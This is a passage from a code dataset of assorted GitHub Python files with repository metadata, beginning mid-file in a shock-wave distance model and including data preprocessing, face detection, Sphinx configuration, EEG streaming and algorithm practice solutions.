fi/1000\n\t\t\tniz_d.append(maks_d)\n\t\tbreak;\n\t\t\n\t\t\n\tniz_t.append(root[0])\n\tniz_d.append(r(root[0]))\n\t\n#Pronalazimo maksimalnu udaljenost aviona od mesta eksplozije, i vreme kretanja za koje je ona postignuta\nmax_d = max(niz_d)\nugao = niz_d.index(max_d)\nts = niz_t[ugao]\n\nmax_d = max(niz_d)\nugao = niz_d.index(max_d)\nts = niz_t[ugao]\n\n\nprint (f'Ugao skretanja: {ugao/1000} rad')\nprint (f'Trenutak sudara sa talasom: {ts} s')\nprint (f'Udaljenost od mesta eksplozije {max_d} m')\n\n\n#Ovaj grafik prikazuje kako se udaljenost menja sa vremenom\nx = list()\nfor i in range(len(niz_d)):\n\tx.append(i/1000);\n\nfig, ax = plt.subplots()\n\nax.plot(x, niz_d)\nax.plot([x[ugao]], [max_d], 'ro')\nax.text(x[ugao], max_d, f' d = {round(max_d, 2)} m')\nax.set_xlabel('Ugao (rad)')\nax.set_ylabel('Daljina (m)')\nax.set_title('Maksimalna daljina')\n\nplt.show()\n","repo_name":"crnomarkovicm/Mathematical-modelling","sub_path":"modelAviona.py","file_name":"modelAviona.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"73412781100","text":"# 로또\nimport sys\n\nans = []\nis_used = [False for _ in range(12)]\n\n\ndef solve(cur_length, length, numbers):\n if cur_length == 6:\n print(*ans)\n return\n\n for i in range(length):\n if not is_used[i]:\n if not ans:\n is_used[i] = True\n ans.append(numbers[i])\n solve(cur_length + 1, length, numbers)\n ans.pop()\n is_used[i] = False\n else:\n if numbers[i] > ans[-1]:\n is_used[i] = True\n ans.append(numbers[i])\n solve(cur_length + 1, length, numbers)\n ans.pop()\n is_used[i] = False\n\n\nwhile True:\n data = list(map(int, sys.stdin.readline().split()))\n k = data[0]\n\n if k == 0:\n break\n\n num_list = data[1:]\n solve(0, k, num_list)\n print(\"\")\n ","repo_name":"ForteEscape/PythonPractice","sub_path":"ProblemSolving/Algorithm/Backtracking/backtracking_problem14.py","file_name":"backtracking_problem14.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"18203910358","text":"import csv, string\nimport tensorflow as tf\nimport gensim\nimport numpy as np\nfrom data_helper import loadGloVe\n\n\ndef _read_csv(input_file):\n \"\"\"\n read csv file,get data\n :param input_file:\n :return:\n \"\"\"\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f)\n lines = []\n for line in reader:\n lines.append(line)\n return lines[1:] # remove header\n\n\ndef sentence_split(sentence, max_length):\n \"\"\"\n remove punctuation and split sentence.return list of words\n :param sentence:\n :return:\n \"\"\"\n # sentence = re.sub(\"[\\s+\\.\\!\\/_,$%^*(+\\\"\\')]+|[+——()?【】“”!,。?、~@#¥%……&*()]+'\", \"\", sentence)\n sentence = [x for x in sentence if x not in string.punctuation]\n sentence = ''.join(sentence)\n words = sentence.split()\n if max_length == 0:\n return words\n else:\n if len(words) > max_length:\n words = words[:max_length]\n elif len(words) < max_length:\n words = words + [\" \"] * (max_length - len(words))\n return words\n\n\ndef embedding_sentence(input_file, save_path, max_length):\n \"\"\"\n get data set and save to tfrecord\n :param data_dir:\n :return:\n \"\"\"\n lines = _read_csv(input_file)\n split_lines = []\n label_list = []\n for line in lines:\n split_lines.append(sentence_split(line[1], max_length))\n label_list.append(int(line[2]))\n del lines\n\n writer = tf.python_io.TFRecordWriter(save_path)\n for index, line in enumerate(split_lines):\n bytes_words = []\n for word in line:\n bytes_words.append(str.encode(word))\n example = tf.train.Example(features=tf.train.Features(feature={\n \"label\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=[label_list[index]])),\n \"features\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=bytes_words))\n }))\n writer.write(example.SerializeToString())\n\n\ndef embedding_sentence_with_model(input_file, save_path, max_length, model_path):\n \"\"\"\n get data set and save to tfrecord\n :param data_dir:\n :return:\n \"\"\"\n # load glove model\n model = gensim.models.KeyedVectors.load_word2vec_format(model_path)\n lines = _read_csv(input_file)\n split_lines = []\n label_list = []\n for line in lines:\n split_lines.append(sentence_split(line[1], max_length))\n label_list.append(int(line[2]))\n del lines\n\n writer = tf.python_io.TFRecordWriter(save_path)\n for index, line in enumerate(split_lines):\n bytes_words = []\n for word in line:\n if word in model:\n bytes_words.extend(model[word])\n else:\n bytes_words.extend([0] * 300)\n example = tf.train.Example(features=tf.train.Features(feature={\n \"label\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=[label_list[index]])),\n \"features\":\n tf.train.Feature(float_list=tf.train.FloatList(value=bytes_words))\n }))\n writer.write(example.SerializeToString())\n\n\ndef save_word_ids(save_path, csv_path, glove_path, embedding_dim, seq_length, mode='train'):\n vocab, embd = loadGloVe(glove_path, embedding_dim)\n # init vocab processor\n vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(seq_length)\n # fit the vocab from glove\n pretrain = vocab_processor.fit(vocab)\n lines = _read_csv(csv_path)\n split_lines = []\n label_list = []\n qid_list = []\n if mode == 'test':\n for line in lines:\n split_lines.append(' '.join(sentence_split(line[1], seq_length)))\n qid_list.append(str.encode(line[0]))\n else:\n for line in lines:\n split_lines.append(' '.join(sentence_split(line[1], seq_length)))\n label_list.append(int(line[2]))\n qid_list.append(str.encode(line[0]))\n word_ids = list(vocab_processor.transform(np.array(split_lines)))\n\n writer = tf.python_io.TFRecordWriter(save_path)\n\n if mode == 'test':\n for index, line in enumerate(word_ids):\n example = tf.train.Example(features=tf.train.Features(feature={\n \"qid\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[qid_list[index]])),\n \"features\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=line))\n }))\n writer.write(example.SerializeToString())\n else:\n for index, line in enumerate(word_ids):\n example = tf.train.Example(features=tf.train.Features(feature={\n \"qid\":\n tf.train.Feature(bytes_list=tf.train.BytesList(value=[qid_list[index]])),\n \"label\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=[label_list[index]])),\n \"features\":\n tf.train.Feature(int64_list=tf.train.Int64List(value=line))\n }))\n writer.write(example.SerializeToString())\n writer.close()\n\n\ndef build_embedding_model(glove_file, gensim_file):\n with open(glove_file, 'r', encoding='utf-8') as f:\n num_lines = 0\n for line in f:\n num_lines += 1\n dims = 300\n gensim_first_line = \"{} {}\".format(num_lines, dims)\n with open(glove_file, 'r', encoding='utf-8') as fin:\n with open(gensim_file, 'w', encoding='utf-8') as fout:\n fout.write(gensim_first_line + '\\n')\n for line in fin:\n fout.write(line)\n\n\ndef build_vocab(model_file, data_file, vocab_path):\n # load glove model\n model = gensim.models.KeyedVectors.load_word2vec_format(model_file)\n lines = _read_csv(data_file)\n vocab = []\n for line in lines:\n vocab.extend(sentence_split(line[1], 0))\n vocab = set(vocab)\n with open(vocab_path, 'w', encoding='utf-8') as f:\n for word in vocab:\n if word in model:\n f.write(word + ' ' + ' '.join([str(x) for x in model[word]]) + '\\n')\n\n\nif __name__ == '__main__':\n glove_file = './glove.840B.300d/glove.840B.300d.txt'\n gensim_file = './glove.840B.300d/glove_model.txt'\n dev_input_file = '../train_data/dev.csv'\n embedding_dim = 300\n max_length = 15\n dev_save_path = '../train_data/dev.tf_record'\n train_input_file = '../train_data/train.csv'\n train_save_path = '../train_data/train.tf_record'\n data_file = '../train_data/deal_train_data.csv'\n vocab_path = '../train_data/vocab.txt'\n dev_word_id_save_path = '../train_data/dev_word_id.tf_record'\n train_word_id_save_path = '../train_data/train_word_id.tf_record'\n # build_embedding_model(glove_file, gensim_file)\n # embedding_sentence(dev_input_file, dev_save_path, max_length)\n # embedding_sentence(train_input_file, train_save_path, max_length)\n # build_vocab(gensim_file, data_file, vocab_path)\n # embedding_sentence_with_model(dev_input_file, dev_save_path, max_length, gensim_file)\n # embedding_sentence_with_model(train_input_file, train_save_path, max_length, gensim_file)\n save_word_ids(dev_word_id_save_path, dev_input_file, vocab_path, embedding_dim, max_length)\n save_word_ids(train_word_id_save_path, train_input_file, vocab_path, embedding_dim, max_length)\n","repo_name":"dstch/Quora_question_classification_ExCalibur","sub_path":"Bi-LSTM/data_saver.py","file_name":"data_saver.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"46640621355","text":"BG = {}\nBG['BLACK'] = '\\033[40m'\nBG['RED'] = '\\033[41m'\nBG['GREEN'] = '\\033[42m'\nBG['YELLOW'] = '\\033[43m'\nBG['BLUE'] = '\\033[44m'\nBG['PURPLE'] = '\\033[45m'\nBG['CYAN'] = '\\033[46m'\nBG['LIGHTGRAY'] = '\\033[47m'\nCOLORS = {}\nCOLORS['RESTORE'] = '\\033[0m'\nCOLORS['RED'] = '\\033[00;31m'\nCOLORS['GREEN'] = '\\033[00;32m'\nCOLORS['YELLOW'] = '\\033[00;33m'\nCOLORS['BLUE'] = '\\033[00;34m'\nCOLORS['PURPLE'] = '\\033[00;35m'\nCOLORS['CYAN'] = '\\033[00;36m'\nCOLORS['TEAL'] = '\\033[00;36m'\nCOLORS['LIGHTGRAY'] = '\\033[00;37m'\nCOLORS['LRED'] = '\\033[01;31m'\nCOLORS['LGREEN'] = '\\033[01;32m'\nCOLORS['LYELLOW'] = '\\033[01;33m'\nCOLORS['LBLUE'] = '\\033[01;34m'\nCOLORS['LPURPLE'] = '\\033[01;35m'\nCOLORS['LCYAN'] = '\\033[01;36m'\nCOLORS['WHITE'] = '\\033[01;37m'\n\n\ndef colorize(item, color=None, underline=False, background=None):\n if underline:\n ul = \"\\033[4m\"\n else:\n ul = ''\n\n if background:\n bg = BG[background.upper()]\n else:\n bg = \"\"\n\n if color:\n c = COLORS[color.upper()]\n else:\n c = COLORS[\"WHITE\"]\n\n return \"%s%s%s%s%s%s\" % (COLORS['RESTORE'],\n c,\n bg, ul, item,\n COLORS['RESTORE'])\n","repo_name":"RHInception/re-client","sub_path":"src/reclient/colorize.py","file_name":"colorize.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"36123165206","text":"#! /usr/bin/env python3\nfrom operator import itemgetter\nimport sys, math\n\n\ntitle_ref = None\n\ndico = {}\ndata = {}\n\nfor line in sys.stdin:\n line = line.strip()\n \n word_title, count = line.split('\\t',1)\n word_stdout, title = word_title.split(';',1)\n try:\n count = int(count)\n except ValueError:\n continue\n # dictionnaire pour pouvoir recuperer le nom + titre dans la boucle for\n data[word_title] = count \n # le if else servira a pouvoir compter le nombre de mots par documents\n if title == title_ref:\n dico[title] = dico.get(title, 0) + count\n else:\n if title:\n title_ref = title \n\n# cas de la derniere ligne\ndico[title] = dico.get(title, 0) + count\n\n\nfor key, val in data.items():\n word, filename = key.split(';', 1)\n print('%s\\t%s\\t%s' % (key, val, dico[filename]))\n\n\n","repo_name":"Kaiiim/MapReduce","sub_path":"tf-idf/Reducer_Tf_Idf.py","file_name":"Reducer_Tf_Idf.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"11322645473","text":"import cv2 # Importing the OpenCV module\n\n# Importing the required cascade file for face detection\nhaar_cas = cv2.CascadeClassifier ('/Users/Aksha/PycharmProjects/Object-Detection/haar cascade/haarcascade_frontalface_default.xml')\n\n# Captures the webcam\nvideo_capture = cv2.VideoCapture(0)\n\nimg_counter = 0\n\nwhile True:\n # Capture each frame. As a webcam is used, the program will not run out of frames\n ret, frame = video_capture.read()\n # Converting to gray -> Almost all image manipulations are done using grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # Keyboard input for either exiting the program or taking a photo.\n k = cv2.waitKey(1)\n # Detecting the faces using the cascade file\n face = haar_cas.detectMultiScale(\n gray,\n scaleFactor=1.5,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n # Draw the rectangle wherever the face is found.\n for (x, y, w, h) in face:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n # The top caption of the program\n cv2.imshow(\"Akshath Mangudi\", frame)\n\n if k % 256 == 27: # ESC button -> For exiting the program\n break\n elif k % 256 == 32: # ENTER button -> For taking a photo\n img_name = \"facedetection-{}.png\".format(img_counter)\n cv2.imwrite(img_name, frame)\n print(\"{} written!\".format(img_name))\n img_counter += 1\n\n\n# Releasing all windows.\nvideo_capture.release()\ncv2.destroyAllWindows()","repo_name":"akshathmangudi/Object-Detection","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"30020351277","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom .. import models\n\n\nUser = get_user_model()\n\n\nclass TweetModelTest(TestCase):\n\n def setUp(self):\n user = User.objects.create_user(username='ronaldtheodoro')\n self.tweet = models.Tweet.objects.create(\n content='My first tweet',\n user=user\n )\n\n def test_exists(self):\n self.assertTrue(models.Tweet.objects.exists())\n","repo_name":"RonaldTheodoro/tweetme","sub_path":"apps/tweet/test/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"40507969943","text":"import sys, os\nsys.path.append(os.path.dirname(os.path.abspath('../../shared/versions.py')))\nfrom versions import *\nsys.path.append(os.path.dirname(os.path.abspath('../../shared')))\n\n# -- General configuration ----------------------------------------------------\n\n# Set variable used to determine which package documentation this is\n# Can be one of 'arkode', 'cvode', 'cvodes', 'ida', 'idas', 'kinsol' or 'super'\npackage_name = 'super'\n\n# If your documentation needs a minimal Sphinx version, state it here.\nneeds_sphinx = '4.0'\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['sphinx_rtd_theme', 'sphinx.ext.ifconfig', 'sphinx.ext.mathjax',\n 'sphinxfortran.fortran_domain', 'sphinxcontrib.bibtex',\n 'sphinx_copybutton', 'sphinx_sundials']\n\n# References\nbibtex_bibfiles = ['../../shared/sundials.bib']\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['../../shared/_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'User Documentation for SUNDIALS'\ncopyright = \"\"\"2002-{year}, Lawrence Livermore National Security and Southern Methodist University\"\"\".format(year = year)\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nsun_version = '{sundials_version}'.format(sundials_version=sundials_version)\nversion = sun_version\n\n# Set the date format (full-month-name day, full-year)\ntoday_fmt = '%B %d, %Y'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = []\n\n# The reST default role (used for this markup: `text`) to use for all documents.\n#default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n#add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\n#add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n#show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\nhighlight_language = \"c\"\n\n# A list of ignored prefixes for module index sorting.\n#modindex_common_prefix = []\n\n# Number figures, tables, and code blocks (can reference by number with numref)\nnumfig = True\n\n# Override format strings that numref/numfig uses\nnumfig_format = {\n 'section': '§%s'\n}\n\nrst_prolog = open('../../shared/global.rst.txt', 'r').read()\n\nrst_epilog = \"\"\"\n.. |YEAR| replace:: {year}\n.. |CVODE_VERSION| replace:: {cvode_version}\n.. |CVODES_VERSION| replace:: {cvodes_version}\n.. |ARKODE_VERSION| replace:: {arkode_version}\n.. |IDA_VERSION| replace:: {ida_version}\n.. |IDAS_VERSION| replace:: {idas_version}\n.. |KINSOL_VERSION| replace:: {kinsol_version}\n\"\"\".format(year = year,\ncvode_version = cvode_version,\ncvodes_version = cvodes_version,\narkode_version = arkode_version,\nida_version = ida_version,\nidas_version = idas_version,\nkinsol_version = kinsol_version\n)\n\n# -- Options for HTML output ---------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'sphinx_rtd_theme'\n\n# Set theme options\nhtml_theme_options = {\n # Allow unlimited depth in table of contents tree\n 'navigation_depth': -1\n}\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n#html_title = None\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\nhtml_logo = '../../shared/figs/sundials_logo_blue.png'\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['../../shared/_static']\n\n# These paths are either relative to html_static_path\n# or fully qualified paths (eg. https://...)\nhtml_css_files = [\n 'css/custom.css'\n]\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\nhtml_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\nhtml_show_sourcelink = False\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\n#html_show_sphinx = True\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. Default is True.\n#html_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'SUNDIALSdoc'\n","repo_name":"LLNL/sundials","sub_path":"doc/superbuild/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":6195,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"92"}
+{"seq_id":"70230521899","text":"import cv2\nimport logging\nimport numpy as np\nimport time\n\nfrom record_msg import pypcd\n\nfrom modules.common_msgs.sensor_msgs import sensor_image_pb2, pointcloud_pb2\nfrom modules.common_msgs.localization_msgs import localization_pb2\nfrom modules.common_msgs.transform_msgs import transform_pb2\n\nclass Builder(object):\n def __init__(self) -> None:\n self._sequence_num = 0\n\n def _build_header(self, header,\n t=None, module_name=None, version=None, frame_id=None):\n header.sequence_num = self._sequence_num\n if t:\n header.timestamp_sec = t\n # todo(zero): no need to add?\n # header.camera_timestamp = int(t * 1e9)\n # header.lidar_timestamp = int(t * 1e9)\n if module_name:\n header.module_name = module_name\n if version:\n header.version = version\n if frame_id:\n header.frame_id = frame_id\n\n\nclass TransformBuilder(Builder):\n def __init__(self) -> None:\n super().__init__()\n\n def build(self, frame_id, child_frame_id, translation, rotation, t):\n pb_transformstampeds = transform_pb2.TransformStampeds()\n pb_transformstamped = pb_transformstampeds.transforms.add()\n if t is None:\n t = time.time()\n\n self._build_header(pb_transformstamped.header, t=t, frame_id=frame_id)\n pb_transformstamped.child_frame_id = child_frame_id\n pb_transformstamped.transform.translation.x = translation[0]\n pb_transformstamped.transform.translation.y = translation[1]\n pb_transformstamped.transform.translation.z = translation[2]\n\n pb_transformstamped.transform.rotation.qw = rotation[0]\n pb_transformstamped.transform.rotation.qx = rotation[1]\n pb_transformstamped.transform.rotation.qy = rotation[2]\n pb_transformstamped.transform.rotation.qz = rotation[3]\n\n self._sequence_num += 1\n return pb_transformstampeds\n\n\nclass LocalizationBuilder(Builder):\n def __init__(self) -> None:\n super().__init__()\n\n def build(self, translation, rotation, heading, t):\n pb_localization = localization_pb2.LocalizationEstimate()\n if t is None:\n t = time.time()\n\n self._build_header(pb_localization.header, t=t, module_name='localization')\n pb_localization.pose.position.x = translation[0]\n pb_localization.pose.position.y = translation[1]\n pb_localization.pose.position.z = translation[2]\n\n pb_localization.pose.orientation.qw = rotation[0]\n pb_localization.pose.orientation.qx = rotation[1]\n pb_localization.pose.orientation.qy = rotation[2]\n pb_localization.pose.orientation.qz = rotation[3]\n\n pb_localization.pose.heading = heading\n\n # todo(zero): need to complete\n # pb_localization.pose.linear_velocity\n # pb_localization.pose.linear_acceleration\n # pb_localization.pose.angular_velocity\n\n pb_localization.measurement_time = t\n self._sequence_num += 1\n return pb_localization\n\n\nclass ImageBuilder(Builder):\n def __init__(self) -> None:\n super().__init__()\n\n def _to_flag(self, encoding):\n if encoding == 'rgb8' or encoding == 'bgr8':\n return cv2.IMREAD_COLOR\n elif encoding == 'gray' or encoding == 'y':\n return cv2.IMREAD_GRAYSCALE\n else:\n print('Unsupported image encoding type: %s.' % encoding)\n return None\n\n def build(self, file_name, frame_id, encoding, t=None):\n pb_image = sensor_image_pb2.Image()\n flag = self._to_flag(encoding)\n if flag is None:\n return\n\n if t is None:\n t = time.time()\n\n self._build_header(pb_image.header, frame_id=frame_id)\n pb_image.frame_id = frame_id\n pb_image.measurement_time = t\n pb_image.encoding = encoding\n\n img = cv2.imread(file_name, flag)\n\n if flag == cv2.IMREAD_COLOR:\n pb_image.height, pb_image.width, channels = img.shape\n pb_image.step = pb_image.width * channels\n elif flag == cv2.IMREAD_GRAYSCALE:\n pb_image.height, pb_image.width = img.shape\n pb_image.step = pb_image.width\n else:\n return\n\n pb_image.data = img.tostring()\n self._sequence_num += 1\n return pb_image\n\n\nclass PointCloudBuilder(Builder):\n def __init__(self, dim=4) -> None:\n super().__init__()\n self._dim = dim\n\n def build(self, file_name, frame_id, t=None):\n pb_point_cloud = pointcloud_pb2.PointCloud()\n\n if t is None:\n t = time.time()\n\n self._build_header(pb_point_cloud.header, t=t, frame_id=frame_id)\n pb_point_cloud.frame_id = frame_id\n # pb_point_cloud.is_dense = False\n pb_point_cloud.measurement_time = t\n\n point_cloud = pypcd.point_cloud_from_path(file_name)\n\n pb_point_cloud.width = point_cloud.width\n pb_point_cloud.height = point_cloud.height\n\n for data in point_cloud.pc_data:\n point = pb_point_cloud.point.add()\n point.x, point.y, point.z, point.intensity, timestamp = data\n point.timestamp = int(timestamp * 1e9)\n\n self._sequence_num += 1\n return pb_point_cloud\n\n def build_nuscenes(self, file_name, frame_id, t=None, lidar_transform=None):\n pb_point_cloud = pointcloud_pb2.PointCloud()\n\n if t is None:\n t = time.time()\n\n self._build_header(pb_point_cloud.header, t=t, frame_id=frame_id)\n pb_point_cloud.frame_id = frame_id\n # pb_point_cloud.is_dense = False\n pb_point_cloud.measurement_time = t\n\n # Loads LIDAR data from binary numpy format.\n # Data is stored as (x, y, z, intensity, ring index).\n scan = np.fromfile(file_name, dtype=np.float32)\n logging.debug(scan[:100])\n\n points = scan.reshape((-1, self._dim))[:, :4]\n\n pb_point_cloud.width = len(points)\n pb_point_cloud.height = 1\n\n # Points shape is (length, 4)\n n0, _ = np.shape(points)\n for i in range(n0):\n point = pb_point_cloud.point.add()\n point.intensity = int(points[i][3])\n points[i][3] = 1\n point.x, point.y, point.z, _ = points[i] @ lidar_transform\n self._sequence_num += 1\n return pb_point_cloud\n","repo_name":"daohu527/record_msg","sub_path":"record_msg/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}
+{"seq_id":"26135453274","text":"def read_sales(filename):\n total = 0.0\n count = 0\n\n with open(filename, \"r\") as f:\n for line in f:\n value = float(line.strip())\n\n total += value\n\n count += 1\n\n print(\"{:.2f}\".format(value))\n\n average = total / count if count > 0 else 0.0\n\n print(\"Total: {:.2f}\".format(total))\n print(\"Count: {}\".format(count))\n print(\"Average: {:.2f}\".format(average))\n\n\nif __name__ == \"__main__\":\n filename = \"sales_totals.txt\"\n read_sales(filename)\n","repo_name":"Dbooker62/PRG105","sub_path":"sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"11325378513","text":"#============================================================================\n# Code: Sending data stream via LSL\n# Author: Jiachen XU \n#\n# Last Update: 2019-11-29\n#============================================================================\n\n\nimport numpy as np\nimport time\nfrom scipy import io as sio\nfrom random import random as rand\n\nfrom pylsl import StreamInfo, StreamOutlet\n\n\nfs = 512 \nupdate_time = 0.01\n\nnsample = np.int(fs*update_time)\ndata = sio.loadmat('data/s01.mat', squeeze_me=True, struct_as_record=False, verify_compressed_data_integrity=False)['eeg']\n\nimagery_left = data.imagery_left - \\\n data.imagery_left.mean(axis=1, keepdims=True)\nimagery_right = data.imagery_right - \\\n data.imagery_right.mean(axis=1, keepdims=True)\n\neeg_data_l = np.vstack([imagery_left * 1e-6, data.imagery_event])\neeg_data_r = np.vstack([imagery_right * 1e-6,\n data.imagery_event * 2])\neeg_data = np.hstack([eeg_data_l, np.zeros((eeg_data_l.shape[0], 500)),\n eeg_data_r])\n\ndatamat = eeg_data \nif datamat.ndim != 2:\n raise ValueError(\"INPUT must be 2-dim!\")\nlen_off_data = datamat.shape[1]\ninfo = StreamInfo('BioSemi', 'EEG', datamat.shape[0], fs, 'float32', 'myuid34234')\noutlet = StreamOutlet(info)\naxis = np.arange(len_off_data)\nlive_index = np.arange(nsample)\nprint(\"now sending data...\")\ncounter = 0\nwhile True:\n mysample = datamat[:, counter].ravel().tolist()\n # now send it and wait\n outlet.push_sample(mysample)\n counter = 0 if counter == len_off_data - 1 else counter + 1\n time.sleep(1.0 / fs)\n","repo_name":"TateXu/jxu","sub_path":"onlinestream/lsl/examples/jxuSendData.py","file_name":"jxuSendData.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"26882939881","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nimport heapq\n#\n# Complete the 'minimumAverage' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY customers as parameter.\ndef minWait(allOrders) :\n heapq.heapify(allOrders)\n totalWaitTime = 0\n numOrders = len(allOrders)\n if numOrders == 0 :\n return 0\n pendingOrders = []\n currentTime = allOrders[0][0]\n loop = True\n while loop :\n while len(allOrders) != 0 and allOrders[0][0] <= currentTime :\n order = heapq.heappop(allOrders) \n heapq.heappush(pendingOrders, (order[1], order[0]))\n if len(pendingOrders) != 0 :\n minWaitOrder = heapq.heappop(pendingOrders)\n waitTime = currentTime - minWaitOrder[1] + minWaitOrder[0]\n totalWaitTime += waitTime\n currentTime += minWaitOrder[0]\n else :\n currentTime += 1\n if len(pendingOrders) == 0 and len(allOrders) == 0 :\n loop = False\n return int(totalWaitTime/numOrders)\n\ndef minimumAverage(customers):\n # Write your code \n heapq.heapify(customers)\n csort = customers[0:]\n CH = [(csort[0][1],csort[0][0])]\n #OT = {csort[0][1]:[csort[0][0]]}\n WT = []\n prevOT = csort[0][0]\n csort.pop(0)\n loop = True\n j = 0\n while loop:\n while csort and csort[0][0] <= prevOT:\n ot,ct = heapq.heappop(csort)\n heapq.heappush(CH,(ot,ct))\n if CH:\n customer = heapq.heappop(CH)\n ctime,otime = customer\n #otime = heapq.heappop(OT[customer])\n wt_prev = WT[-1] if WT else 0\n wt_i = ctime + wt_prev + prevOT-otime\n WT.append(wt_i)\n prevOT = otime\n else:\n j+=1\n prevOT+=1\n if j > 100000:\n j = 0\n prevOT = csort[0][0]\n if not csort and not CH:\n break\n\n \n print(WT)\n return int(sum(WT)/len(WT))\n \n\n# if __name__ == '__main__':\n# fptr = open(os.environ['OUTPUT_PATH'], 'w')\nimport testcase_minavgwaittime3\nn = int(input().strip())\n\ncustomers = []\n\nfor _ in range(n):\n customers.append(list(map(int, input().rstrip().split())))\n\nresult = minWait(customers)\n\nprint(str(result) + '\\n')\n\n#fptr.close()\n","repo_name":"christophermoverton/codewars","sub_path":"minavgwaittime.py","file_name":"minavgwaittime.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
